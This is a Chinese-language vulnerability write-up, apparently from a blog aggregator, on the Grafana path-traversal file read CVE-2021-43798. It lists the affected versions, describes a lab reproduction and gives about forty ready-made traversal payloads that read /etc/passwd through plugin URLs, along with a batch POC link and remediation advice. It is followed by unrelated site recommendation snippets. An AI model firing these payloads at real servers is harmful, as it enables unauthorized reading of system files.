hana-u
hana-u

Grafana任意文件读取漏洞(CVE-2021-43798)

一、漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

二、漏洞影响范围

影响版本:
Grafana 8.0.0 - 8.3.0

安全版本:
Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7

三、vulfocus靶场复现

Grafana任意文件读取漏洞(CVE-2021-43798)_第1张图片
Grafana任意文件读取漏洞(CVE-2021-43798)_第2张图片
其他payload:

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

批量验证POC:https://github.com/culprits/Grafana_POC-CVE-2021-43798
Grafana任意文件读取漏洞(CVE-2021-43798)_第3张图片

四、修复建议

1.升级到最新版本
2.若无法及时更新,可设置Grafana仅对可信地址开放,即白名单访问;禁止系统对公网开放。

你可能感兴趣的:(安全,web安全)

  • 工程化与框架系列(31)--前端依赖管理实践 一进制ᅟᅠ        ‌‍‎‏  前端工程化与框架前端
    前端依赖管理实践引言前端依赖管理是现代Web开发中的重要环节。本文将深入探讨前端依赖管理的最佳实践,包括包管理工具、版本控制、依赖分析和优化等方面,帮助开发者更好地管理项目依赖。依赖管理概述前端依赖管理主要包括以下方面:包管理工具:npm、yarn、pnpm等版本控制:语义化版本、锁文件等依赖分析:依赖树、循环依赖等依赖优化:体积优化、重复依赖等安全管理:漏洞检测、更新维护等依赖管理工具实现依赖分
  • C++中explicit类型转换运算符 水瓶丫头站住 C++关键字c++开发语言
    在C++中,explicit类型转换运算符是用于防止隐式类型转换的关键特性。它主要应用于类的类型转换运算符(如operatortype()),确保类型转换必须通过显式调用来触发,从而提高代码安全性和可读性。以下是详细解析:核心概念基本语法classMyClass{public:explicitoperatorint()const{returnvalue;}private:intvalue;};ex
  • 网络安全常用命令 GoldMinnie 信息安全web安全网络linux
    finger查找并显示用户信息catcat命令允许我们创建单个或多个文件,查看文件cat>gg.txtsomethinglikethatcatgg.txtsomethinglikethatzipzip[options]目标压缩包名称待压缩源文件zippass.zippass.txtadding:pass.txt(stored<
  • Linux - 安全策略命令 你可知这世上再难遇我 Linux2024~23技能大赛运维系统安全
    查看用户组cat/etc/group创建用户组devgroupadddev创建用户devuser并加入dev指定用户组
  • 嵌入式面试真题——Linux内核空间与用户空间 70000cc 嵌入式面试真题linuxc语言嵌入式硬件面试单片机
    本文以32位系统为例介绍内核空间(kernelspace)和用户空间(userspace)。对32位操作系统而言,它的寻址空间(虚拟地址空间,或叫线性地址空间)为4G(2的32次方)。也就是说一个进程的最大地址空间为4G。操作系统的核心是内核(kernel),它独立于普通的应用程序,可以访问受保护的内存空间,也有访问底层硬件设备的所有权限。为了保证内核的安全,现在的操作系统一般都强制用户进程不能直
  • RISC-V双核锁步高性能抗辐照MCU芯片技术解析与应用 国科安芯 产品risc-v单片机嵌入式硬件
    1.概念名词解析安全冗余设计AS32X601系列通过硬件ECC(ErrorCorrectionCode)保护存储系统(内置SRAM、Flash等),并在DMA模块中提供“可选的双核锁步安全备份”机制,支持高可靠性场景下的数据传输容错。该设计符合ISO26262ASIL-B功能安全等级要求,适用于需检测瞬态或永久性硬件故障的工业与汽车应用。抗辐照性能该芯片通过增强型SEU(单粒子翻转)和SEL(单粒
  • 网络安全运维手册 网安墨雨 web安全运维安全
    1网络安全概述1.1定义信息安全:为数据处理系统建立和采用的技术和管理的安全保护,保护计算机硬件、软件和数据不因偶然和恶意的原因遭到破坏、更改和泄露。网络安全:防止未授权的用户访问信息防止未授权而试图破坏与修改信息1.2信息安全特性(CIA)可用性:确保授权用户在需要时可以访问信息并使用相关信息资产完整性:保护信息和信息的处理方法准确而完整机密性:确保只有经过授权的人才能访问信息1.3网络安全的威
  • 全闪存储系统揭秘:数据保护 上海川源信息科技 微服务架构云原生
    上期文章我们谈到,当采用RAID技术对SSD进行数据保护,不仅会折损SSD的性能,可靠度也大打折扣。当存储系统超过两块SSD故障时,数据恢复也面临挑战。全闪存储系统架构除了传统的双活架构,我们还可以有别的选择吗?数据保护技术如果不采用SSDRAID,我们如何确保当发生硬盘故障时,SSD内的数据安全?川源的答案川源国产自研“无共享对称式双活(active-active)架构”,基于闪存的物理特性,从
  • 对象存储.阿里云OSS、腾讯云COS 、亚马逊S3、华为云OBS对比分析? 学博成 技术阿里云云计算
    对象存储是一种将数据存储为独立对象,并使用RESTfulAPI或其他接口进行访问的存储方式。目前市场上有多种对象存储产品,以下是其中一些知名的产品:1.阿里云OSS(ObjectStorageService)简介:阿里云OSS是一款海量、安全、低成本、高可靠的云存储服务,提供99.9999999999%(12个9)的数据持久性,以及99.995%的数据可用性。特点:海量存储:适合存储各种类型的大数
  • 快速方便地在Linux上安装Chrome XyScala linuxchrome服务器
    在Linux系统上安装Chrome是许多用户的常见需求之一。Chrome是一款功能强大的网络浏览器,提供了快速、安全和稳定的浏览体验。本文将为您提供一种快速便捷的方法来安装Chrome浏览器。以下是在Linux系统上安装Chrome的步骤:步骤1:打开终端首先,打开终端。您可以通过在应用程序菜单中搜索"终端"来找到它。步骤2:添加GoogleChrome存储库在终端中,使用以下命令添加Google
  • JavaScript的学习6——jQuery 十五春会
    文章目录jQuery选择器按ID查找按tag查找按class查找按属性查找组合查找多项选择器练习层级选择器子选择器(ChildSelector)过滤器(Filter)表单相关练习查找和过滤操作DOM修改Text和HTML修改CSS显示和隐藏DOM获取DOM信息操作表单修改DOM结构添加DOM删除节点练习事件鼠标事件键盘事件其他事件事件参数取消绑定事件触发条件浏览器安全限制练习动画show/hide
  • Redis 分布式锁 DebugDiver代码深处潜水员 三方件redis分布式数据库
    Redis分布式锁是一种在分布式系统中实现互斥访问共享资源的机制。它利用Redis的高性能和原子性操作来确保在多个节点之间安全地获取和释放锁。下面是对Redis分布式锁的原理讲解和源码剖析。原理讲解1.基本概念锁:在分布式系统中,锁用于确保在同一时间只有一个节点能够访问共享资源。分布式锁:分布式锁是一种在多个节点之间共享的锁,通常通过一个共享的存储系统(如Redis)来实现。2.Redis实现分布
  • 2025年渗透测试面试题总结-安恒 (题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全web安全红蓝攻防
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录安恒1.sqlmap爆出当前数据库库名的参数是什么?2.nmap探测系统类型的参数是?3.nmap的小写-o和-A是做啥的?4.布尔盲注的具体语句是啥?5.宽字节原理6.Python是否存在反序列化漏洞?7.GET与POST传参的区别8.HTTP请求方式9.如何判断C
  • C# BlockingCollection 卷纸要用清风的 C#c#javalinux
    什么是`BlockingCollection`主要特点构造函数常用方法生产者操作消费者操作示例代码注意事项串口接收底层存储的类型线程安全和并发访问串口数据接收的顺序性关键点BlockingCollection是C#中一个非常有用的线程安全集合类,位于System.Collections.Concurrent命名空间中。它主要用于在多线程环境中实现线程安全的生产者-消费者模式。以下是关于Blocki
  • 深入解析STM32时钟树:从原理到实战配置 Electron-er stm32单片机嵌入式硬件
    目录引言一、STM32时钟树体系架构解析1.1时钟树全景图1.2核心时钟源详解二、时钟信号流向与控制逻辑2.1主时钟路径2.2关键分频系数2.3时钟门控机制三、CubeMX实战配置3.1配置步骤演示3.2代码生成分析四、调试技巧与常见问题4.1时钟诊断方法4.2典型故障排查五、高级应用技巧5.1动态时钟切换5.2时钟安全系统(CSS)5.3超频实践(风险提示)结语引言在嵌入式系统开发中,时钟系统堪
  • PHP火山引擎API签名方法 蚊子爱喝水 PHP火山引擎
    一、前置准备在开始签名之前,需要准备以下信息:AccessKeyID(AK):请求火山引擎OpenAPI的安全凭证之一。SecretAccessKey(SK):与AK成对使用,用于签名计算。请求参数:包括HTTP请求方法、URI、查询参数、请求头等。二、签名流程(文档地址)火山引擎API签名流程大致分为以下几个步骤:创建规范请求:将请求参数进行规范化处理,形成CanonicalRequest。创建
  • 2025版最新如何参加护网行动?零基础入门到精通,收藏这篇就够了! 程序媛西米 网络安全web安全网络安全HVV护网行动网络安全计算机
    1.什么是护网行动护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来
  • 24.pocsuite3:开源的远程漏洞测试框架 白帽少女安琪拉 安全工具网络安全网络
    一、项目介绍pocsuite3是一款由Knownsec404Team开发的开源远程漏洞测试框架,专注于快速验证和利用已知漏洞。其通过模块化设计和插件化架构,支持用户编写自定义POC(ProofofConcept),覆盖Web漏洞、系统漏洞、数据库漏洞等多种类型,适用于红队渗透、漏洞验证及安全研究等场景。1.1核心功能模块化设计:支持编写、加载和执行自定义POC,灵活适应不同场景。内置丰富的POC库
  • 2025年渗透测试面试题总结-阿里巴巴-阿里云安全(二面)(题目+回答) 独行soc 2025年渗透测试面试指南科技安全web安全面试职场和发展红蓝攻防阿里云
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录阿里巴巴-阿里云安全二面一、职业方向与技术偏好1.安全研究vs安全研发的定位二、云安全与身份认证2.云上PKI与身份认证的关注方向三、项目实践与成果3.字节跳动训练营项目四、攻防技术深度解析4.SQL注入攻防方案5.WAF防护原理五、团队协作与效能优化6.分工协作与个
  • Electron + VUE3 桌面应用,主进程和渲染进程通信 读心悦 深入浅出的Electronelectronvue.js前端
    之前写过篇主进程和渲染进程之间的通信,这里主要是记录一下VUE版本的应用,主进程和渲染进程之间的通信。思路是一样,唯一不同的是代码。在开发Electron应用的时候,从安全的角度来考虑,尽量不要在渲染进程中,直接调用ElectronAPI,因此我们需要预加载JS脚本,在这个脚本中,把我们用到的API暴露出去。代码如下:constcreateWindow=()=>{constwin=newBrows
  • Websoft9:为开发者打造的高效 Linux 服务器面板 linuxlinux运维运维
    Websoft9作为一款以开源应用部署与管理为核心的服务器面板,其平台设计与运行环境深度耦合,形成了“环境即服务”的独特模式。这种关系体现在环境标准化、自动化配置、安全融合及资源管理等多个维度。以下从四个核心层面详细阐述二者的协同机制:一、运行环境标准化:平台能力的基石Websoft9的运行环境并非孤立存在,而是平台功能实现的底层支撑。多语言与框架的预集成•平台内置PHP、Python、Java、
  • 16天 - 单例模式有哪几种实现?如何保证线程安全?什么是策略模式?一般用在什么场景?什么是模板方法模式?一般用在什么场景? 和道一文字yyds 单例模式安全策略模式
    单例模式有哪几种实现?如何保证线程安全?单例模式是一种确保某个类在程序中只有一个实例,并提供全局访问点的设计模式。以下是几种常见的单例模式实现方式及其线程安全保证方法:饿汉式饿汉式单例在类加载时就创建好实例对象,因此在程序调用时直接返回该单例对象即可。由于类加载的过程是线程安全的,所以饿汉式单例不存在线程安全问题。publicclassEagerSingleton{privatestaticfin
  • 高安全可靠CAN FD芯片ASM1042的技术特性与应用前景 国科安芯 产品单片机嵌入式硬件架构fpga开发
    1.ASM1042简介ASM1042是国科安芯推出的一款高性能CANFD(CANwithFlexibleData-Rate)收发器芯片,专为高可靠性场景设计。该芯片基于ISO11898-2:2016和ISO11898-5:2007物理层标准开发,支持最高5Mbps的数据传输速率,适用于汽车、航天、军工及工业控制等领域。其核心特性包括:高耐压设计:总线保护电压最高达±70V(H型号),共模输入电压范
  • 亚马逊测评自养号IP重要性 全哥聊跨境 zcwz-008 服务器网络运维
    大家好我是测评全哥,今天我给大家讲一下做亚马逊测评项目需要用到的防关联、防封号环境的一些底层技术原理。这里讲的内容我相信很少有人能掌握,都是一些比较难的IP技术。如果你现在准备开始做测评是在了解阶段还是已经在做测评工作室了。这里给大家讲的内容可以马上看一下,你们的环境是不是100%的安全,是不是容易出现莫名被封号或者被砍单的现象,如果做不到,那尽早的放弃吧,即使你花了1万块钱买的设备,也不要觉得可
  • 【系统架构设计师】论文:论信息系统的安全风险评估 数据知道 系统架构安全系统架构设计师论文软考高级架构
    论文:论信息系统的安全风险评估文章目录摘要正文总结摘要2023年3月,我参加了某石化公司的实验室信息管理系统项目的开发工作,该系统作为该石化公司产品质量信息管理平台,将实验室的自动化分析仪器与计算机网络进行联结,实现自动采集样品分析数据,对样品检验过程、实验室资源进行严格管理,实现从原料进厂、生产、中间控制直至成品出厂的全过程质量数据管理,以及全公司范围内质量数据的快速传递与共享。我作为项目负责人
  • 电子电气架构 ---常见车规MCU安全启动方案 车载诊断技术 EV(电动汽车)常规知识必备车载电子与软件框架车载电子电气架构架构单片机安全人工智能AI在整车产品领域的应用
    我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师:简单,单纯,喜欢独处,独来独往,不易合同频过着接地气的生活,除了生存温饱问题之外,没有什么过多的欲望,表面看起来很高冷,内心热情,如果你身边有这样灵性的人,一定要好好珍惜他们眼中有神有光,干净,给人感觉很舒服,有超强的感知能力有形的无形的感知力很强,能感知人的内心变化喜欢独处,好静,
  • Spring Boot整合参数校验的技术学习 小码快撩 springboot学习java
    引言在软件开发中,数据校验是一个非常重要的环节,它确保了数据的完整性和安全性。SpringBoot作为一款流行的Java框架,提供了非常方便的参数校验功能。本文将详细介绍如何在SpringBoot中整合参数校验,并通过示例代码演示其使用方法。一、依赖管理在SpringBoot中整合参数校验的依赖管理相对简单,因为SpringBoot默认集成了HibernateValidator作为其参数校验的支持
  • PC版微信占满硬盘?这款清理神器一键搞定! zyw05120113 个人开发智能手机djangoocrpdf
    嘿,朋友们!微信现在几乎是咱们生活中离不开的聊天工具了,不管是手机还是电脑,基本都得装上它。但是,用的时间长了,PC版微信就会占用越来越多的硬盘空间。要是不清理,不仅电脑会变慢,隐私也可能不安全。今天,我就给大家分享一款我超喜欢的微信清理小工具——CleanWeChatX。CleanWeChatX这款工具是吾爱大神开发的,特别专业。它不用安装,下载后直接双击就能用。别看它只有4.05MB,功能可一
  • SSL证书:网站安全的守护者 ssl证书
    在互联网时代,网站安全至关重要。SSL证书,如同网站的安全卫士,默默守护着用户的数据安全,为网站构建起一道坚固的防线。如何申请SSL证书?登录JoySSL官网注册账号填写注册码【230930】有专属技术指导申请SSL证书的流程非常简单:选择证书类型:根据网站需求选择合适的SSL证书类型。生成CSR文件:在服务器上生成证书签名请求(CSR)文件。提交申请:将CSR文件提交给证书颁发机构(CA),并完
  • 《信息系统安全》课后习题答案(陈萍) 1ce0range 系统安全安全
    第一章一、填空题1、机密性、完整性、可用性2、主动3、设备安全、数据安全、内容安全、行为安全4、通信保密、信息安全、信息安全保障5、保护、检测、响应、恢复二、选择题1、D2、C3、B4、A5、D6、A7、C8、B9、A10、B第二章一、填空题1、《保密系统的信息理论》,DES,RSA2、相同、存在确定的转换关系3、单向、机密性、不可否认性4、混淆、扩散5、完整性6、流密码7、密钥8、穷举法、分析法
  • html 周华华 html
    js 1,数组的排列 var arr=[1,4,234,43,52,]; for(var x=0;x<arr.length;x++){    for(var y=x-1;y<arr.length;y++){      if(arr[x]<arr[y]){     &
  • 【Struts2 四】Struts2拦截器 bit1129 struts2拦截器
    Struts2框架是基于拦截器实现的,可以对某个Action进行拦截,然后某些逻辑处理,拦截器相当于AOP里面的环绕通知,即在Action方法的执行之前和之后根据需要添加相应的逻辑。事实上,即使struts.xml没有任何关于拦截器的配置,Struts2也会为我们添加一组默认的拦截器,最常见的是,请求参数自动绑定到Action对应的字段上。   Struts2中自定义拦截器的步骤是:
  • make:cc 命令未找到解决方法 daizj linux命令未知make cc
    安装rz sz程序时,报下面错误:   [root@slave2 src]# make posix cc   -O -DPOSIX -DMD=2 rz.c -o rz make: cc:命令未找到 make: *** [posix] 错误 127   系统:centos 6.6 环境:虚拟机   错误原因:系统未安装gcc,这个是由于在安
  • Oracle之Job应用 周凡杨 oracle job
    最近写服务,服务上线后,需要写一个定时执行的SQL脚本,清理并更新数据库表里的数据,应用到了Oracle 的 Job的相关知识。在此总结一下。   一:查看相关job信息    1、相关视图  dba_jobs  all_jobs  user_jobs  dba_jobs_running 包含正在运行
  • 多线程机制 朱辉辉33 多线程
    转至http://blog.csdn.net/lj70024/archive/2010/04/06/5455790.aspx 程序、进程和线程: 程序是一段静态的代码,它是应用程序执行的蓝本。进程是程序的一次动态执行过程,它对应了从代码加载、执行至执行完毕的一个完整过程,这个过程也是进程本身从产生、发展至消亡的过程。线程是比进程更小的单位,一个进程执行过程中可以产生多个线程,每个线程有自身的
  • web报表工具FineReport使用中遇到的常见报错及解决办法(一) 老A不折腾 web报表finereportjava报表报表工具
    FineReport使用中遇到的常见报错及解决办法(一) 这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。   1、address pool is full: 含义:地址池满,连接数超过并发数上
  • mysql rpm安装后没有my.cnf 林鹤霄 没有my.cnf
    Linux下用rpm包安装的MySQL是不会安装/etc/my.cnf文件的, 至于为什么没有这个文件而MySQL却也能正常启动和作用,在这儿有两个说法, 第一种说法,my.cnf只是MySQL启动时的一个参数文件,可以没有它,这时MySQL会用内置的默认参数启动, 第二种说法,MySQL在启动时自动使用/usr/share/mysql目录下的my-medium.cnf文件,这种说法仅限于r
  • Kindle Fire HDX root并安装谷歌服务框架之后仍无法登陆谷歌账号的问题 aigo root
    原文:http://kindlefireforkid.com/how-to-setup-a-google-account-on-amazon-fire-tablet/   Step 4: Run ADB command from your PC   On the PC, you need install Amazon Fire ADB driver and instal
  • javascript 中var提升的典型实例 alxw4616 JavaScript
    // 刚刚在书上看到的一个小问题,很有意思.大家一起思考下吧 myname = 'global'; var fn = function () { console.log(myname); // undefined var myname = 'local'; console.log(myname); // local }; fn() // 上述代码实际上等同于以下代码 m
  • 定时器和获取时间的使用 百合不是茶 时间的转换定时器
    定时器:定时创建任务在游戏设计的时候用的比较多   Timer();定时器 TImerTask();Timer的子类  由 Timer 安排为一次执行或重复执行的任务。       定时器类Timer在java.util包中。使用时,先实例化,然后使用实例的schedule(TimerTask task, long delay)方法,设定
  • JDK1.5 Queue bijian1013 javathreadjava多线程Queue
    JDK1.5 Queue LinkedList: LinkedList不是同步的。如果多个线程同时访问列表,而其中至少一个线程从结构上修改了该列表,则它必须 保持外部同步。(结构修改指添加或删除一个或多个元素的任何操作;仅设置元素的值不是结构修改。)这一般通过对自然封装该列表的对象进行同步操作来完成。如果不存在这样的对象,则应该使用 Collections.synchronizedList 方
  • http认证原理和https bijian1013 httphttps
    一.基础介绍         在URL前加https://前缀表明是用SSL加密的。 你的电脑与服务器之间收发的信息传输将更加安全。         Web服务器启用SSL需要获得一个服务器证书并将该证书与要使用SSL的服务器绑定。 http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后
  • 【Java范型五】范型继承 bit1129 java
    定义如下一个抽象的范型类,其中定义了两个范型参数,T1,T2   package com.tom.lang.generics; public abstract class SuperGenerics<T1, T2> { private T1 t1; private T2 t2; public abstract void doIt(T
  • 【Nginx六】nginx.conf常用指令(Directive) bit1129 Directive
    1. worker_processes    8; 表示Nginx将启动8个工作者进程,通过ps -ef|grep nginx,会发现有8个Nginx Worker Process在运行   nobody 53879 118449 0 Apr22 ? 00:26:15 nginx: worker process
  • lua 遍历Header头部 ronin47 lua header 遍历 
    local headers = ngx.req.get_headers()   ngx.say("headers begin", "<br/>")   ngx.say("Host : ", he
  • java-32.通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小(两数组的差最小)。 bylijinnan java
    import java.util.Arrays; public class MinSumASumB { /** * Q32.有两个序列a,b,大小都为n,序列元素的值任意整数,无序. * * 要求:通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小。 * 例如: * int[] a = {100,99,98,1,2,3
  • redis 开窍的石头 redis
    在redis的redis.conf配置文件中找到# requirepass foobared 把它替换成requirepass 12356789 后边的12356789就是你的密码 打开redis客户端输入config get requirepass 返回 redis 127.0.0.1:6379> config get requirepass 1) "require
  • [JAVA图像与图形]现有的GPU架构支持JAVA语言吗? comsci java语言
          无论是opengl还是cuda,都是建立在C语言体系架构基础上的,在未来,图像图形处理业务快速发展,相关领域市场不断扩大的情况下,我们JAVA语言系统怎么从这么庞大,且还在不断扩大的市场上分到一块蛋糕,是值得每个JAVAER认真思考和行动的事情       
  • 安装ubuntu14.04登录后花屏了怎么办 cuiyadll ubuntu
    这个情况,一般属于显卡驱动问题。 可以先尝试安装显卡的官方闭源驱动。 按键盘三个键:CTRL + ALT  +  F1 进入终端,输入用户名和密码登录终端: 安装amd的显卡驱动 sudo  apt-get  install  fglrx 安装nvidia显卡驱动 sudo  ap
  • SSL 与 数字证书 的基本概念和工作原理 darrenzhu 加密ssl证书密钥签名
    SSL 与 数字证书 的基本概念和工作原理 http://www.linuxde.net/2012/03/8301.html SSL握手协议的目的是或最终结果是让客户端和服务器拥有一个共同的密钥,握手协议本身是基于非对称加密机制的,之后就使用共同的密钥基于对称加密机制进行信息交换。 http://www.ibm.com/developerworks/cn/webspher
  • Ubuntu设置ip的步骤 dcj3sjt126com ubuntu
    在单位的一台机器完全装了Ubuntu Server,但回家只能在XP上VM一个,装的时候网卡是DHCP的,用ifconfig查了一下ip是192.168.92.128,可以ping通。 转载不是错: Ubuntu命令行修改网络配置方法 /etc/network/interfaces打开后里面可设置DHCP或手动设置静态ip。前面auto eth0,让网卡开机自动挂载. 1. 以D
  • php包管理工具推荐 dcj3sjt126com PHPComposer
    http://www.phpcomposer.com/   Composer是 PHP 用来管理依赖(dependency)关系的工具。你可以在自己的项目中声明所依赖的外部工具库(libraries),Composer 会帮你安装这些依赖的库文件。 中文文档  入门指南  下载  安装包列表 Composer 中国镜像
  • Gson使用四(TypeAdapter) eksliang jsongsonGson自定义转换器gsonTypeAdapter
    转载请出自出处:http://eksliang.iteye.com/blog/2175595 一.概述        Gson的TypeAapter可以理解成自定义序列化和返序列化 二、应用场景举例        例如我们通常去注册时(那些外国网站),会让我们输入firstName,lastName,但是转到我们都
  • JQM控件之Navbar和Tabs gundumw100 htmlxmlcss
    在JQM中使用导航栏Navbar是简单的。 只需要将data-role="navbar"赋给div即可: <div data-role="navbar"> <ul> <li><a href="#" class="ui-btn-active&qu
  • 利用归并排序算法对大文件进行排序 iwindyforest java归并排序大文件分治法Merge sort
      归并排序算法介绍,请参照Wikipeida zh.wikipedia.org/wiki/%E5%BD%92%E5%B9%B6%E6%8E%92%E5%BA%8F 基本思想: 大文件分割成行数相等的两个子文件,递归(归并排序)两个子文件,直到递归到分割成的子文件低于限制行数 低于限制行数的子文件直接排序 两个排序好的子文件归并到父文件 直到最后所有排序好的父文件归并到输入
  • iOS UIWebView URL拦截 啸笑天 UIWebView
    本文译者:candeladiao,原文:URL filtering for UIWebView on the iPhone说明:译者在做app开发时,因为页面的javascript文件比较大导致加载速度很慢,所以想把javascript文件打包在app里,当UIWebView需要加载该脚本时就从app本地读取,但UIWebView并不支持加载本地资源。最后从下文中找到了解决方法,第一次翻译,难免有
  • 索引的碎片整理SQL语句 macroli sql
    SET NOCOUNT ON DECLARE @tablename VARCHAR (128) DECLARE @execstr VARCHAR (255) DECLARE @objectid INT DECLARE @indexid INT DECLARE @frag DECIMAL DECLARE @maxfrag DECIMAL --设置最大允许的碎片数量,超过则对索引进行碎片
  • Angularjs同步操作http请求with $promise qiaolevip 每天进步一点点学习永无止境AngularJS纵观千象
    // Define a factory app.factory('profilePromise', ['$q', 'AccountService', function($q, AccountService) { var deferred = $q.defer(); AccountService.getProfile().then(function(res) {
  • hibernate联合查询问题 sxj19881213 sqlHibernateHQL联合查询
    最近在用hibernate做项目,遇到了联合查询的问题,以及联合查询中的N+1问题。 针对无外键关联的联合查询,我做了HQL和SQL的实验,希望能帮助到大家。(我使用的版本是hibernate3.3.2)   1 几个常识:  (1)hql中的几种join查询,只有在外键关联、并且作了相应配置时才能使用。  (2)hql的默认查询策略,在进行联合查询时,会产
  • struts2.xml wuai struts
    <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他